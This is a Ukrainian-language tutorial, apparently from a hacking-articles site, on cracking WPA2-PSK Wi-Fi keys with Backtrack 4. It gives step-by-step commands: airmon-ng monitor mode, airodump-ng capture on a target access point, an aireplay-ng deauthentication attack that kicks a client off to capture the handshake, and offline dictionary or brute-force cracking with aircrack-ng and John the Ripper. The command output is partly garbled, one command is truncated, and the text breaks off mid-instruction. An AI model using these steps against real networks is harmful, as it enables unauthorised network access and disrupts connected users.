Зламуємо WPA2 PSK використовуючи Backtrack 4, aircrack-ng та John The Ripper - Статті для хакера -

Я використовував картку Dlink DWL-G122 (USB) під час написання цієї статті. У Backtrack4 цей пристрій видно під ім'ям wlan0.

Для початку перекладаємо картку в режим "monitor mode": root@bt:

# airmon-ng Interface Chipset Driver wifi0 Atheros madwifi-ng ath0 Atheros madwifi-ng VAP (parent: wifi0) ath1 Atheros madwifi-ng VAP (parent: wifi0) wlan0 Ralink 2573 USB rt73usb - [phy0] root@bt:

# airmon-ng start wlan0 Interface Chipset Driver wifi0 Atheros madwifi-ng ath0 Atheros madwifi-ng VAP (parent: wifi0) ath1 Atheros madwifi-ng VAP (parent: wifi0) wlan0 Ralink 2573 USB rt73usb - [phy0] (monitor mode enabled on mon0)

Зроблено і тепер ми можемо використовувати карту як mon0

Тепер скануємо доступні бездротові мережі, що використовують WPA2/PSK : root@bt:

# airodump-ng mon0 CH 6 ] [ Elapsed: 4 s ] :5B:52:AD:F7 -33 5 0 0 10 54 WPA2 CCMP PSK TestNet BSSID STATION PWR Rate Lost Packets Probe 00:19:5B:52:AD:F7 00:1C:BF:90 :5B:A3 -29 0- 1 12 4 TestNet

Зупиніть airodump-ng і запустіть його знову, записуючи всі пакети у файл: airodump-ng mon0 --channel 10 --bssid 00:19:5B:52:AD:F7 -w /tmp/wpa2

# aireplay-ng -0 1 -a 00:19:5B:52:AD:F7 -c 00:1C:BF:90:5B:A3 mon0 13:04:19 Waiting for beacon frame (BSSID: 00 :19:5B:52:AD:F7) on channel 10 13:04:20 Sending 64 directed DeAuth. STMAC: [00:1C:BF:90:5B:A3] [6766 ACKs]

В результаті airodump-ng повинен показати "WPA Handshake:" у верхньому правому куті: CH 10 ][ Elapsed: 2mins ][ 2009-02-21 13:04 ][ WPA handshake: 00:19:5B:52:AD:F7 BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00 :19:5B:52:AD:F7 -33 100 1338 99 0 10 54 WPA2 CCMP PSK TestNet BSSID STATION PWR Rate Lost Packets Probe 00:19:5B:52:AD:F7 00:1C: BF:90:5B:A3 -27 54-54 0 230

Зупиніть airodump-ng і переконайтеся, що всі необхідні файли створені root@bt:/# ls /tmp/wpa2* -al -rw-r--r-- 1 root root 35189 2009-02-21 13 :04 /tmp/wpa2-01.cap -rw-r--r-- 1 root root 476 2009-02-21 13:04 /tmp/wpa2-01.csv -rw-r- -r-- 1 root root 590 2009-02-21 13:04 /tmp/wpa2-01.kismet.csv

З цього моменту вам не потрібно бути десь неподалік від точки доступу. Весь злом буде відбуватися офлайн, тому ви можете зупинити airodump та інші процеси. Насправді, ви можете запустити процес злому та йти спати, гуляти та інше. Злом WPA2 PSK базується на брутфорсі, і може тривати тривалий час. Існує два шляхи злому: перший досить швидкий, але не гарантує успіху, а другий досить повільний, але гарантує, що рано чи пізно ви знайдете ключ.

Перший метод ґрунтується на списках/словниках. Велику кількість даних файлів ви можете знайти в інтернеті (наприклад, www.theargon.com), або ви можете згенерувати його самостійно використовуючи утиліти, подібні до John The Ripper. Як тільки словник створений, ви можете запустити aircrack-ng з даним словником і файлом .cap, який містить WPA2 Handshake. :F7 /tmp/wpa2*.cap

Успішність злому залежить від складності пароля. Іншими словами, вам може пощастити і ви знайдете ключ одразу, або не знайдете його зовсім. Наступний метод, брутфорс, буде успішним практично напевно, але може зайняти дуже тривалий термін.Необхідно розуміти, що ключ WPA2 може містити до 64 символів. Для початку злому, якщо ви хочете використовувати John The Ripper для створення всіх можливих парольних комбінацій, виконайте наступну команду.